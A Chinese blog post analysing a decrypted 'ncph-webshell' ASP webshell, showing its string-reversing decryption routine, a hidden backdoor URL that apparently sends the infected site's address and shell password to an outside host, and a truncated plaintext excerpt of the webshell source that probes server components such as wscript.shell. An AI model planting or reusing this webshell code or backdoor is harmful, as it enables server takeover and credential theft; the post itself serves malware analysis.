• 欢迎访问金刀客博客!
  • 2019,春节快乐!

解密的ncph-webshell及后门全分析

原创天空 admin 3261次浏览 已收录 1个评论

加密方式竟然和上篇文章(随机加密webshell的解密)的加密方式一样,汗!这些webshell也是大同小异,没多大区别。
不同的是加密函数不一样。

Function UZSS(objstr)
objstr = Replace(objstr, “`”, “”””)
For i = 1 To Len(objstr)
If Mid(objstr, i, 1) <> “~” Then
NewStr = Mid(objstr, i, 1) & NewStr
Else
NewStr = vbCrLf & NewStr
End If
Next
UZSS = NewStr
End Function

后门地址还是一样的

http://vg.la/1/?u=localhost/jiemi.asp&p=ahhacker’)”>

界面如此相似,看来我遇到假的ncph-webshell了。
来一漂亮截图

加密及解密文件
点击下载此文件
明文代码:

<%@ LANGUAGE = VBScript.Encode %><% UserPass="ahhacker" '修改密码 mName="ncph-webshell" SiteURL="http://www.ncph.net” ‘网站
Copyright=”ncph-webshell” ‘版权
AD=”ncph-webshell” ‘广告文字
AD=”注:请限于网站管理员安全检测用,请务使用于非法用途,后果作者概不负责!” ‘广告文字
imgurl=”
” & Err.Description & “

Err.Clear:Response.Flush
End If
end sub:Sub RRS(str):response.write(str):End Sub:Function RePath(S):RePath=Replace(S,”\”,”\\”):End Function:Function RRePath(S):RRePath=Replace(S,”\\”,”\”):End Function:URL=Request.ServerVariables(“URL”):ServerIP=Request.ServerVariables(“LOCAL_ADDR”):Action=Request(“Action”):RootPath=Server.MapPath(“.”):WWWRoot=Server.MapPath(“/”):u=request.servervariables(“http_host”)&url:p=userpass:posurl=”http”:FolderPath=Request(“FolderPath”):FName=Request(“FName”):BackUrl=”

返回
“:function face(Color,Siz,Var):if Siz=0 then
siz=””
else
siz=” size='”&Siz&”‘”:end if:face=”“&Var&”“:End function
Function UZSS(objstr)
objstr = Replace(objstr, “`”, “”””)
For i = 1 To Len(objstr)
If Mid(objstr, i, 1) <> “~” Then
NewStr = Mid(objstr, i, 1) & NewStr
Else
NewStr = vbCrLf & NewStr
End If
Next
UZSS = NewStr
End Function
RRS”
RRS”“&mName&” – “&ServerIP&”
RRS”


RRS”"
rrs ""
Dim ObT(13,2):ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "文件操作组件":ObT(1,0) = "wscript.shell":ObT(1,2) = "命令行执行组件":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS建库组件":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS压缩组件":ObT(4,0) = "Scripting.Dictionary" :ObT(4,2) = "数据流上传辅助组件":ObT(5,0) = "Adodb.connection":ObT(5,2) = "数据库连接组件":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "数据流上传组件":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp 文件上传组件":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "刘云峰文件上传组件":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload 文件上传组件":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail 邮件收发组件":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "虚拟SMTP发信组件":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail发信组件":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "数据传输组件"
For i=0 To 13
Set T=Server.CreateObject(ObT(i,0))
If -2147221005 <> Err Then
IsObj=" √"
Else
IsObj="×"
Err.Clear
End If
Set T=Nothing
ObT(i,1)=IsObj
Next
If FolderPath<>"" then
Session("FolderPath")=RRePath(FolderPath)
End If
If Session("FolderPath")="" Then
FolderPath=RootPath
Session("FolderPath")=FolderPath
End if
.............................................................


金刀客博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明解密的ncph-webshell及后门全分析
喜欢 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到
(1)个小伙伴在吐槽
  1. 不只你遇到了,大家都遇到了
    Falw2009-08-15 18:58 回复